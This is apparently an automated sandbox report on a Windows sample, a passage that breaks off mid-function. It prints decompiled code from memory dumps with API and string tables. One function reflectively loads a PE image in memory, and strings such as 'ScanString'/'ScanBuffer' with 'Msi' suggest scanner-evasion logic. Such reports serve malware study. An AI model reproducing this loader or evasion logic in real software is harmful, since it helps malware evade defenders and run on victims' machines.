4; // 0xe _t105 = *0x4666bc; // 0x35986 E00402EFC( *_t7, 0x4666d8, _t105, _t60); _t64 = *0x466730; // 0x270a970 E00403928(_t64); _t67 = *0x466768; // 0x2685838 E0045F4E8(_t67, &_v20, 0x460ba0); _t107 = *0x45f30c; // 0x45f310 E00405BC4(0x46676c, _t107, _v20); E0040473C(0x466750); _t74 = *0x46676c; // 0x26d0c98 _t10 = _t74 + 8; // 0x264fe08 _t75 = *_t10; __eflags = _t75; if(_t75 != 0) { _t91 = _t75 - 4; __eflags = _t91; _t75 = *_t91; } __eflags = _t75 - 1; if(_t75 >= 1) { *0x4666d8 = _t75; do { E00404924(); _t75 = E00404A08(0x466750, _v24); *0x4666d8 = *0x4666d8 - 1; __eflags = *0x4666d8; } while ( *0x4666d8 != 0); } _push(0x460b50); _push( *0x466744); _push("ScanString"); E00404AC0(); _push(_v28); _t108 = *0x466744; // 0x26f5078 E00404A4C( &_v32, _t108, 0x460b50); _pop(_t132); E0045EBB0(_v32, 0x4666d8, 0x4666c8, _t132, _t140); __eflags = E004072FC(0x4666c8, L0045F39C) * 0x177; _t86 = *0x466750; // 0x261c4d8, executed E0045EEE8(_t86, 0x4666d8, _t139, _t140, E004072FC(0x4666c8, L0045F39C) * 0x177); // executed } else { L0045F39C(); } } _pop(_t112); *[fs:eax] = _t112; _push(0x460b1f); E00404760( &_v32, 3); _t114 = *0x45f30c; // 0x45f310 E00405B88( &_v20, _t114); return E00404760( &_v16, 3); } 0x00460860 0x00460860 0x00460865 0x00460866 0x00460867 0x00460868 0x00460869 0x0046086a 0x0046086b 0x00460874 0x00460875 0x0046087a 0x0046087d 0x00460880 0x00460887 0x00460893 0x00460896 0x0046089b 0x004608a2 0x004608bf 0x004608a4 0x004608ae 0x004608ae 0x004608c7 0x004608d2 0x004608e4 0x004608f8 0x00460907 0x0046091c 0x0046092d 0x00460941 0x00460964 0x00460976 0x00460981 0x00460993 0x0046099e 0x004609a7 0x004609b7 0x004609bd 0x004609cd 0x004609d4 0x004609d9 0x004609dc 0x004609e2 0x004609ed 0x004609f2 0x00460a05 0x00460a0a 0x00460a17 0x00460a1d 0x00460a2d 0x00460a32 0x00460a37 0x00460a37 0x00460a3a 0x00460a3c 0x00460a3e 0x00460a3e 0x00460a41 0x00460a41 0x00460a43 0x00460a46 0x00460a48 0x00460a4a 0x00460a5d 0x00460a6a 0x00460a6f 0x00460a71 0x00460a71 0x00460a4a 0x00460a7c 0x00460a81 0x00460a87 0x00460a94 0x00460a9c 0x00460aa0 0x00460aab 0x00460ab8 0x00460ab9 0x00460ad2 0x00460ad8 0x00460add 0x0046090c 0x0046090c 0x0046090c 0x00460907 0x00460ae4 0x00460ae7 0x00460aea 0x00460af7 0x00460aff 0x00460b05 0x00460b17

APIs

InetIsOffline.URL(000124F2,00000000,00460B18,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0046089B AuditFree.ADVAPI32(000124F2,00000000,00460B18,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0046090C Part of subcall function 0045EBB0: LoadLibraryA.KERNEL32(00000000,00000000,0045EC57), ref: 0045EBF9 Part of subcall function 0045EBB0: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0045EC57), ref: 0045EC01 Part of subcall function 0045EBB0: GetProcAddress.KERNEL32(738C0000,00000000), ref: 0045EC35

Strings

Msi , xrefs: 004608BA DllRegisterServer , xrefs: 004608DF, 00460923 rrrrrrrtutFrk , xrefs: 004608A9 mssip32 , xrefs: 00460928 ScanString , xrefs: 00460A87

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressAuditFreeHandleInetLibraryLoadModuleOfflineProc String ID: DllRegisterServer$Msi$ScanString$mssip32$rrrrrrrtutFrk API String ID: 1378522473-1273433984 Opcode ID: 1a1d8f9adc02558ed4163bbe0ea72374faa3b49d1cfe5cb0d8b7d1e1aed7a199 Instruction ID: bf328fdb3b7fff0191df84ddc3a21c00582c8a3fcbdfa349bb387af89ecb309a Opcode Fuzzy Hash: 1a1d8f9adc02558ed4163bbe0ea72374faa3b49d1cfe5cb0d8b7d1e1aed7a199 Instruction Fuzzy Hash: 1951B0743002058BD700EBA5D942A6A73A5EB85309F51C07BE900AB7E2EB7CED05CB5F

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 40%

E0045EEE8(char __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) { char _v8; char _v16; intOrPtr _v20; char _v24; intOrPtr _t73; intOrPtr _t74; void* _t81; struct HINSTANCE__* _t115; intOrPtr _t125; long _t127; intOrPtr _t128; intOrPtr _t130; signed int _t135; signed int _t139; long _t142; signed int _t144; void* _t147; signed int _t150; void* _t154; void* _t156; void* _t157; void* _t158; intOrPtr _t171; intOrPtr _t193; void* _t213; void* _t225; intOrPtr _t230; intOrPtr _t232; intOrPtr _t234; intOrPtr _t235; intOrPtr _t236; intOrPtr _t237; signed int _t241; intOrPtr* _t246; _push(0); _push(0); _push(0); _push(0); _push(0); _push(__ebx); _v8 = __eax; E00404BF0(_v8); _push(_t246); _push(0x45f200); _push( *[fs:eax]); *[fs:eax] = _t246; E00404790(0x466694, 0x45f21c); _push(0xd); _push(0xd); _push(0x1d); E00404A4C( &_v16, _v8, 0x45f228); *0x466634 = _v16; _push(0xd); _push(0xd); _push(0x1d); _push(0x45f244); _push( *0x466694); _push("ScanBuffer"); E00404AC0(); _push(_v20); _t171 = *0x466694; // 0x26f5088 E00404A4C( &_v24, _t171, 0x45f244); _pop(_t225); E0045EBB0(_v24, __ebx, 0x4666a0, _t225, 0x466644); E004072FC(0x4666a0, 0x466694); _t73 = *0x466634; // 0x2666268 _push(0); _push(_t73); _t74 = *0x466634; // 0x2666268 _t10 = _t74 + 0x3c; // 0x100 asm("cdq"); asm("adc edx, [esp+0x4]"); *0x46663c = *_t10 + *_t246; _push(0xd); _push(0xd); _push(0x1d); _t81 = VirtualAlloc(0, *( *0x46663c + 0x50), 0x2000, 1); // executed *0x466630 = _t81; _push(0xd); _push(0xd); _push(0x1d); *0x466638 = *0x466630 - *((intOrPtr*)( *0x46663c + 0x34)); _push(0xd); _push(0xd); _push(0x1d); _t230 = *0x46663c; _t231 = *(_t230 + 0x14) & 0x0000ffff; *0x466640 = *0x46663c + 0x18 + ( *(_t230 + 0x14) & 0x0000ffff); _push(0xd); _push(0xd); _t193 = 0x10; _push(0x1d); _t154 = ( *( *0x46663c + 6) & 0x0000ffff) - 1; if(_t154 >= 0) { _t158 = _t154 + 1; *0x466644 = 0; do { _push(_t193); _t135 = *0x466644 + *0x466644 * 4; _t234 = *0x466640; // 0x2666460 _t18 = _t135 * 8; // 0x10550 *0x46664c = *(_t234 + _t18 + 8); _push(_t193); _t139 = *0x466644 + *0x466644 * 4; _t235 = *0x466640; // 0x2666460 _t23 = _t139 * 8; // 0x10600 *0x466650 = *((intOrPtr*)(_t235 + _t23 + 0x10)); _push(_t193); _t142 = *0x46664c; // 0x10 _t144 = *0x466644 + *0x466644 * 4; _t236 = *0x466640; // 0x2666460 _t28 = _t144 * 8; // 0x1000 _t147 = VirtualAlloc( *((intOrPtr*)(_t236 + _t28 + 0xc)) + *0x466630, _t142, 0x1000, 4); // executed *0x466648 = _t147; _push(_t193); _t150 = *0x466644 + *0x466644 * 4; _t237 = *0x466640; // 0x2666460 _t33 = _t150 * 8; // 0x400 _t231 = *0x466648; // 0x228b000 _t193 = *0x466650; // 0x200 E00402EFC( *((intOrPtr*)(_t237 + _t33 + 0x14)) + *0x466634, _t158, _t193, _t231); *0x466644 = *0x466644 + 1; _t158 = _t158 - 1; } while (_t158 != 0); } _push(0xd); _push(0xd); _push(0x1d); *0x466658 = *((intOrPtr*)( *0x46663c + 0x28)) + *0x466630; _push(0xd); _push(0xd); _push(0x1d); E0045ECE4( *((intOrPtr*)( *0x46663c + 0xa0)) + *0x466630); _push(0xd); _push(0xd); _push(0x1d); E0045ED90( *((intOrPtr*)( *0x46663c + 0x80)) + *0x466630, _t154, 0x46663c, 0x466644); // executed _push(0xd); _push(0xd); _t213 = _t193 + 3 - 1 + 4 - 1 + 4 - 1 + 4 - 1 + 1; _push(0x1d); _t156 = ( *( *0x46663c + 6) & 0x0000ffff) - 1; if(_t156 >= 0) { _t157 = _t156 + 1; *0x466644 = 0; do { _push(_t213); _t241 = *0x466644 + *0x466644 * 4; _t125 = *0x466640; // 0x2666460 _t42 = _t241 * 8; // 0x60000020 _t127 = E0045EC64( *((intOrPtr*)(_t125 + _t42 + 0x24)), _t231); _t128 = *0x466640; // 0x2666460 _t45 = _t241 * 8; // 0x10550 _t130 = *0x466640; // 0x2666460 _t48 = _t241 * 8; // 0x1000 VirtualProtect( *((intOrPtr*)(_t130 + _t48 + 0xc)) + *0x466630, *(_t128 + _t45 + 8), _t127, 0x4666a4); // executed *0x466644 = *0x466644 + 1; _t157 = _t157 - 1; } while (_t157 != 0); } _t115 = *0x4666a8; // 0x738c0000 FreeLibrary(_t115); *0x466658( *0x466630, 1, 0, 0x1d, 0xd, 0xd); // executed _pop(_t232); *[fs:eax] = _t232; _push(0x45f207); E00404760( &_v24, 3); return E0040473C( &_v8); } 0x0045eeed 0x0045eeee 0x0045eeef 0x0045eef0 0x0045eef1 0x0045eef2 0x0045eef5 0x0045eefb 0x0045ef0c 0x0045ef0d 0x0045ef12 0x0045ef15 0x0045ef24 0x0045ef2d 0x0045ef30 0x0045ef34 0x0045ef41 0x0045ef49 0x0045ef52 0x0045ef55 0x0045ef59 0x0045ef5b 0x0045ef60 0x0045ef66 0x0045ef73 0x0045ef7b 0x0045ef7f 0x0045ef8a 0x0045ef97 0x0045ef98 0x0045efac 0x0045efb1 0x0045efb8 0x0045efb9 0x0045efba 0x0045efbf 0x0045efc2 0x0045efc6 0x0045efcd 0x0045efd3 0x0045efd6 0x0045efda 0x0045efeb 0x0045eff0 0x0045eff9 0x0045effc 0x0045f000 0x0045f00d 0x0045f017 0x0045f01a 0x0045f01e 0x0045f025 0x0045f027 0x0045f02d 0x0045f036 0x0045f039 0x0045f03c 0x0045f03d 0x0045f045 0x0045f048 0x0045f04e 0x0045f04f 0x0045f055 0x0045f055 0x0045f05e 0x0045f061 0x0045f067 0x0045f06b 0x0045f070 0x0045f079 0x0045f07c 0x0045f082 0x0045f086 0x0045f08b 0x0045f099 0x0045f0a1 0x0045f0a4 0x0045f0aa 0x0045f0b5 0x0045f0ba 0x0045f0bf 0x0045f0c8 0x0045f0cb 0x0045f0d1 0x0045f0db 0x0045f0e1 0x0045f0e7 0x0045f0ec 0x0045f0ee 0x0045f0ee 0x0045f055 0x0045f0f9 0x0045f0fc 0x0045f100 0x0045f10d 0x0045f116 0x0045f119 0x0045f11d 0x0045f12d 0x0045f136 0x0045f139 0x0045f13d 0x0045f14d 0x0045f156 0x0045f159 0x0045f15c 0x0045f15d 0x0045f165 0x0045f168 0x0045f16a 0x0045f16b 0x0045f171 0x0045f171 0x0045f17f 0x0045f182 0x0045f187 0x0045f18b 0x0045f191 0x0045f196 0x0045f19b 0x0045f1a0 0x0045f1ab 0x0045f1b0 0x0045f1b2 0x0045f1b2 0x0045f171 0x0045f1c2 0x0045f1c8 0x0045f1d7 0x0045f1df 0x0045f1e2 0x0045f1e5 0x0045f1f2 0x0045f1ff

APIs

Part of subcall function 0045EBB0: LoadLibraryA.KERNEL32(00000000,00000000,0045EC57), ref: 0045EBF9 Part of subcall function 0045EBB0: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0045EC57), ref: 0045EC01 Part of subcall function 0045EBB0: GetProcAddress.KERNEL32(738C0000,00000000), ref: 0045EC35 VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,0000001D), ref: 0045EFEB VirtualAlloc.KERNEL32(-00465630,00000010,00001000,00000004,?,?,?,0000001D,0000001D,0000001D,00000000,?,00002000,00000001,0000001D), ref: 0045F0B5 VirtualProtect.KERNEL32(-00465630,00010550,00000000,004666A4,?,0000001D,0000001D,0000001D,0000001D,0000001D,0000001D,0000001D,00000000,?,00002000,00000001), ref: 0045F1AB FreeLibrary.KERNEL32(738C0000,0000001D,0000001D,0000001D,0000001D,0000001D,0000001D,0000001D,0000001D,00000000,?,00002000,00000001,0000001D), ref: 0045F1C8

Strings

ScanBuffer , xrefs: 0045EF66 Msi , xrefs: 0045EF1F

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocLibrary$AddressFreeHandleLoadModuleProcProtect String ID: Msi$ScanBuffer API String ID: 2006266006-3561555771 Opcode ID: 5ad3b546da17034dca05153c687320dbe9ba89b0f212579352e76a09de489316 Instruction ID: f50dc9b62a688634fe35a12e90ff385b065f388c4a73e1f7ea8b28ac3d343785 Opcode Fuzzy Hash: 5ad3b546da17034dca05153c687320dbe9ba89b0f212579352e76a09de489316 Instruction Fuzzy Hash: 86A17B716902819FE314DF48EC86F3173A8FB45709F21543FFA51DB2A2E6F4A8058E99

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 85%

E004543D8(char __edx, void* __edi) { char _v5; void* __ebx; void* __ecx; void* __ebp; intOrPtr _t25; intOrPtr* _t28; intOrPtr* _t29; intOrPtr* _t48; intOrPtr _t59; intOrPtr _t60; intOrPtr _t61; intOrPtr _t62; intOrPtr _t65; void* _t66; char _t67; void* _t77; struct HDC__* _t78; void* _t79; void* _t80; _t77 = __edi; _t67 = __edx; if(__edx != 0) { _t80 = _t80 + 0xfffffff0; _t25 = E00403C34(_t25, _t79); } _v5 = _t67; _t65 = _t25; E00420664(_t66, 0); _t28 = *0x462b90; // 0x461bb8 *((intOrPtr*)(_t28 + 4)) = _t65; *_t28 = 0x45477c; _t29 = *0x462ba0; // 0x461bc0 *((intOrPtr*)(_t29 + 4)) = _t65; *_t29 = 0x454788; E00454794(_t65); *((intOrPtr*)(_t65 + 0x3c)) = GetKeyboardLayout(0); *((intOrPtr*)(_t65 + 0x4c)) = E004038F8(1); *((intOrPtr*)(_t65 + 0x50)) = E004038F8(1); *((intOrPtr*)(_t65 + 0x54)) = E004038F8(1); *((intOrPtr*)(_t65 + 0x58)) = E004038F8(1); *((intOrPtr*)(_t65 + 0x7c)) = E004038F8(1); _t78 = GetDC(0); *((intOrPtr*)(_t65 + 0x40)) = GetDeviceCaps(_t78, 0x5a); ReleaseDC(0, _t78); _t11 = _t65 + 0x58; // 0x44c77c6e _t48 = *0x462d20; // 0x46632c *((intOrPtr*)( *_t48))(0, 0, E0045022C, *_t11); *((intOrPtr*)(_t65 + 0x84)) = E004256F8(1); *((intOrPtr*)(_t65 + 0x88)) = E004256F8(1); *((intOrPtr*)(_t65 + 0x80)) = E004256F8(1); E00454BC4(_t65, _t65, _t66, _t77); _t15 = _t65 + 0x84; // 0x38004010 _t59 = *_t15; *((intOrPtr*)(_t59 + 0xc)) = _t65; *((intOrPtr*)(_t59 + 8)) = 0x454a94; _t18 = _t65 + 0x88; // 0x90000000 _t60 = *_t18; *((intOrPtr*)(_t60 + 0xc)) = _t65; *((intOrPtr*)(_t60 + 8)) = 0x454a94; _t21 = _t65 + 0x80; // 0xcc000000 _t61 = *_t21; *((intOrPtr*)(_t61 + 0xc)) = _t65; *((intOrPtr*)(_t61 + 8)) = 0x454a94; _t62 = _t65; if(_v5 != 0) { E00403C8C(_t62); _pop( *[fs:0x0]); } return _t65; } 0x004543d8 0x004543d8 0x004543e0 0x004543e2 0x004543e5 0x004543e5 0x004543ea 0x004543ed 0x004543f3 0x004543f8 0x004543fd 0x00454400 0x00454406 0x0045440b 0x0045440e 0x00454416 0x00454422 0x00454431 0x00454440 0x0045444f 0x0045445e 0x0045446d 0x00454477 0x00454481 0x00454487 0x0045448c 0x0045449a 0x004544a1 0x004544af 0x004544c1 0x004544d3 0x004544db 0x004544e0 0x004544e0 0x004544e6 0x004544e9 0x004544f0 0x004544f0 0x004544f6 0x004544f9 0x00454500 0x00454500 0x00454506 0x00454509 0x00454510 0x00454516 0x00454518 0x0045451d 0x00454524 0x0045452d

APIs

GetKeyboardLayout.USER32 ref: 0045441D GetDC.USER32(00000000), ref: 00454472 GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045447C ReleaseDC.USER32 ref: 00454487

Strings

$BB , xrefs: 004544A5, 004544B7, 004544C9 ,cF , xrefs: 0045449A

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDeviceKeyboardLayoutRelease String ID: $BB$,cF API String ID: 3331096196-156580243 Opcode ID: 02c75ae8c1627ca64d2ff0d71c190112e98667be6a53cd907d2e82956fb5bcf6 Instruction ID: 0b584d1e58491fa1ea5d4c96f00a0c4a7644df09fe4235dac3e087649deaa05e Opcode Fuzzy Hash: 02c75ae8c1627ca64d2ff0d71c190112e98667be6a53cd907d2e82956fb5bcf6 Instruction Fuzzy Hash: 9C31D7716042419FD740EF69D8C5B487BE4FB05319F4580BAF818DF3A3EB79A8489B19

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%

E00454BC4(void* __eax, void* __ebx, void* __ecx, void* __edi) { signed char _v5; struct tagLOGFONTA _v65; struct tagLOGFONTA _v185; struct tagLOGFONTA _v245; void _v405; void* _t23; int _t27; void* _t30; intOrPtr _t38; struct HFONT__* _t41; struct HFONT__* _t45; struct HFONT__* _t49; intOrPtr _t52; intOrPtr _t54; void* _t57; intOrPtr _t66; void* _t72; void* _t74; void* _t75; intOrPtr _t76; _t72 = __edi; _t74 = _t75; _t76 = _t75 + 0xfffffe6c; _t57 = __eax; _v5 = 0; if( *0x466580 != 0) { _t54 = *0x466580; // 0x26df470 _v5 = *(_t54 + 0x88) & 0x000000ff; } _push(_t74); _push(0x454d0b); _push( *[fs:eax]); *[fs:eax] = _t76; if( *0x466580 != 0) { _t52 = *0x466580; // 0x26df470 E00457684(_t52, 0); } if(SystemParametersInfoA(0x1f, 0x3c, &_v65, 0) == 0) { _t23 = GetStockObject(0xd); _t7 = _t57 + 0x84; // 0x38004010 E00425B48( *_t7, _t23, _t72); } else { _t49 = CreateFontIndirectA( &_v65); // executed _t6 = _t57 + 0x84; // 0x38004010 E00425B48( *_t6, _t49, _t72); } _v405 = 0x154; _t27 = SystemParametersInfoA(0x29, 0, &_v405, 0); // executed if(_t27 == 0) { _t14 = _t57 + 0x80; // 0xcc000000 E00425C2C( *_t14, 8); _t30 = GetStockObject(0xd); _t15 = _t57 + 0x88; // 0x90000000 E00425B48( *_t15, _t30, _t72); } else { _t41 = CreateFontIndirectA( &_v185); _t11 = _t57 + 0x80; // 0xcc000000 E00425B48( *_t11, _t41, _t72); _t45 = CreateFontIndirectA( &_v245); _t13 = _t57 + 0x88; // 0x90000000 E00425B48( *_t13, _t45, _t72); } _t16 = _t57 + 0x80; // 0xcc000000 E004258CC( *_t16, 0xff000017); _t17 = _t57 + 0x88; // 0x90000000 E004258CC( *_t17, 0xff000007); _pop(_t66); *[fs:eax] = _t66; _push(0x454d12); if( *0x466580 != 0) { _t38 = *0x466580; // 0x26df470 return E00457684(_t38, _v5 & 0x000000ff); } return 0; } 0x00454bc4 0x00454bc5 0x00454bc7 0x00454bce 0x00454bd0 0x00454bdb 0x00454bdd 0x00454be9 0x00454be9 0x00454bee 0x00454bef 0x00454bf4 0x00454bf7 0x00454c01 0x00454c05 0x00454c0a 0x00454c0a 0x00454c20 0x00454c3c 0x00454c43 0x00454c49 0x00454c22 0x00454c26 0x00454c2d 0x00454c33 0x00454c33 0x00454c4e 0x00454c65 0x00454c6c 0x00454ca2 0x00454cad 0x00454cb4 0x00454cbb 0x00454cc1 0x00454c6e 0x00454c75 0x00454c7c 0x00454c82 0x00454c8e 0x00454c95 0x00454c9b 0x00454c9b 0x00454cc6 0x00454cd1 0x00454cd6 0x00454ce1 0x00454ce8 0x00454ceb 0x00454cee 0x00454cfa 0x00454d00 0x00000000 0x00454d05 0x00454d0a

APIs

SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 00454C19 CreateFontIndirectA.GDI32(?), ref: 00454C26 GetStockObject.GDI32(0000000D), ref: 00454C3C Part of subcall function 00425C2C: MulDiv.KERNEL32(00000000,?,00000048), ref: 00425C39 SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00454C65 CreateFontIndirectA.GDI32(?), ref: 00454C75 CreateFontIndirectA.GDI32(?), ref: 00454C8E GetStockObject.GDI32(0000000D), ref: 00454CB4

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFontIndirect$InfoObjectParametersStockSystem String ID: API String ID: 2891467149-0 Opcode ID: 3707ccf87d63a4fde2d24c5a51ee6470f37ba181e11017e0d22171a681295a96 Instruction ID: 0f587122efedf7d321ac9ee3614aa9c37689806316be6897d166c53c05cdaab1 Opcode Fuzzy Hash: 3707ccf87d63a4fde2d24c5a51ee6470f37ba181e11017e0d22171a681295a96 Instruction Fuzzy Hash: 3131D6307042109BEB10EB65DC42B9937E4AB84309F4140B7FD48DB29BEA789848872D

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 65%

E0042AD08(void* __ebx, void* __esi) { char _v8; intOrPtr _v12; int _t12; intOrPtr* _t15; void* _t22; void* _t33; intOrPtr _t40; void* _t43; void* _t45; void* _t46; intOrPtr _t47; _t43 = __esi; _t33 = __ebx; _t45 = _t46; _t47 = _t46 + 0xfffffef8; _v8 = 0; _push(_t45); _push(0x42ae0b); _push( *[fs:eax]); *[fs:eax] = _t47; _t12 = *0x466354; // 0x60 *0x461c30 = ~(MulDiv(8, _t12, 0x48)); _t15 = *0x462f2c; // 0x4617c0 if( *_t15 == 1 && E0042ACC4() == 0x80) { E004047D4( &_v8, "Tahoma"); } _v12 = E00423918(1); _push(_t45); _push(0x42adc3); _push( *[fs:eax]); *[fs:eax] = _t47; E004239B8(_v12, 0x80000002); _t22 = E00423A1C(_v12, _t33, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes", _t43); // executed _t50 = _t22; if(_t22 != 0) { E00423C4C(_v12, &_v8, "MS Shell Dlg 2", _t50); E00423988(_v12); } _pop(_t40); *[fs:eax] = _t40; _push(0x42adca); return E00403928(_v12); } 0x0042ad08 0x0042ad08 0x0042ad09 0x0042ad0b 0x0042ad13 0x0042ad18 0x0042ad19 0x0042ad1e 0x0042ad21 0x0042ad26 0x0042ad35 0x0042ad3a 0x0042ad42 0x0042ad55 0x0042ad55 0x0042ad66 0x0042ad6b 0x0042ad6c 0x0042ad71 0x0042ad74 0x0042ad7f 0x0042ad8c 0x0042ad91 0x0042ad93 0x0042ada0 0x0042ada8 0x0042ada8 0x0042adaf 0x0042adb2 0x0042adb5 0x0042adc2

APIs

MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0042AD2E Part of subcall function 0042ACC4: GetDC.USER32(00000000), ref: 0042ACCD Part of subcall function 0042ACC4: SelectObject.GDI32(00000000,058A00B4), ref: 0042ACDF Part of subcall function 0042ACC4: GetTextMetricsA.GDI32(00000000), ref: 0042ACEA Part of subcall function 0042ACC4: ReleaseDC.USER32 ref: 0042ACFB

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes , xrefs: 0042AD84 MS Shell Dlg 2 , xrefs: 0042AD98 Tahoma , xrefs: 0042AD50

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsObjectReleaseSelectText String ID: MS Shell Dlg 2$SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$Tahoma API String ID: 2013942131-1011973972 Opcode ID: c8202af20d9748dac184fdcebe63c5273684063c3cf8487cfb81228802ca49f1 Instruction ID: 9d3ea1dbbf15434387875305194268bf5b9a98b32bb9e77b65e1f96db536e4fd Opcode Fuzzy Hash: c8202af20d9748dac184fdcebe63c5273684063c3cf8487cfb81228802ca49f1 Instruction Fuzzy Hash: 2211D370700114AFC710DF65E80195D7BB6EB0A304FD14076F800A7BA1DB7D9E22871A

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 94%

E004217E0(intOrPtr _a4, short _a6, intOrPtr _a8) { struct _WNDCLASSA _v44; struct HINSTANCE__* _t6; CHAR* _t8; struct HINSTANCE__* _t9; int _t10; void* _t11; struct HINSTANCE__* _t13; struct HWND__* _t15; long _t17; struct HINSTANCE__* _t19; CHAR* _t20; struct HWND__* _t22; CHAR* _t24; _t6 = *0x4657f8; // 0x400000 *0x461c04 = _t6; _t8 = *0x461c18; // 0x4217d0 _t9 = *0x4657f8; // 0x400000 _t10 = GetClassInfoA(_t9, _t8, &_v44); asm("sbb eax, eax"); _t11 = _t10 + 1; if(_t11 == 0 || L00406E54 != _v44.lpfnWndProc) { if(_t11 != 0) { _t19 = *0x4657f8; // 0x400000 _t20 = *0x461c18; // 0x4217d0 UnregisterClassA(_t20, _t19); } RegisterClassA(0x461bf4); } _t13 = *0x4657f8; // 0x400000 _t24 = *0x461c18; // 0x4217d0 _t15 = E0040730C(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000); // executed _t22 = _t15; if(_a6 != 0) { _t17 = E00421724(_a4, _a8); // executed SetWindowLongA(_t22, 0xfffffffc, _t17); } return _t22; } 0x004217e7 0x004217ec 0x004217f5 0x004217fb 0x00421801 0x00421809 0x0042180b 0x0042180e 0x0042181c 0x0042181e 0x00421824 0x0042182a 0x0042182a 0x00421834 0x00421834 0x0042184a 0x00421857 0x00421862 0x00421867 0x0042186e 0x00421876 0x0042187f 0x0042187f 0x0042188a

APIs

GetClassInfoA.USER32 ref: 00421801 UnregisterClassA.USER32 ref: 0042182A RegisterClassA.USER32 ref: 00421834 SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0042187F

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$InfoLongRegisterUnregisterWindow String ID: API String ID: 4025006896-0 Opcode ID: ba9f0a0cd088f042a5653a67c0e6f88016342e97d15f47e505010de3adbd19bf Instruction ID: 027158a3b90695bcfb74c3b3aa95824c4aefdb47031e860d546c877da2bcb83e Opcode Fuzzy Hash: ba9f0a0cd088f042a5653a67c0e6f88016342e97d15f47e505010de3adbd19bf Instruction Fuzzy Hash: 52016171B44105ABCB00FBA9EC81F9A3399E718314F144136F914E73F1EA79A88187AE

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 63%

E00423A1C(void* __eax, void* __ebx, void* __edx, void* __esi) { char _v8; char _v9; void* _v16; char* _t61; signed int _t64; char* _t67; signed int _t70; char* _t73; signed int _t76; signed char _t96; intOrPtr _t109; void* _t118; void* _t121; _v8 = 0; _t118 = __eax; _push(_t121); _push(0x423bb6); _push( *[fs:eax]); *[fs:eax] = _t121 + 0xfffffff4; E004047D4( &_v8, __edx); _t96 = E004238DC(_v8); if(_t96 == 0) { E00404CA0( &_v8, 1, 1); } _v16 = 0; _t61 = E00404C00(_v8); _t64 = RegOpenKeyExA(E00423A08(_t118, _t96), _t61, 0, 0x20019, &_v16); // executed _v9 = _t64 == 0; if(_v9 == 0) { _t67 = E00404C00(_v8); _t70 = RegOpenKeyExA(E00423A08(_t118, _t96), _t67, 0, 0x20009, &_v16); _v9 = _t70 == 0; if(_v9 == 0) { _t73 = E00404C00(_v8); _t76 = RegOpenKeyExA(E00423A08(_t118, _t96), _t73, 0, 1, &_v16); _v9 = _t76 == 0; if(_v9 != 0) { *(_t118 + 0x18) = 1; if(((_t76 & 0xffffff00 | *((intOrPtr*)(_t118 + 4)) != 0x00000000) & 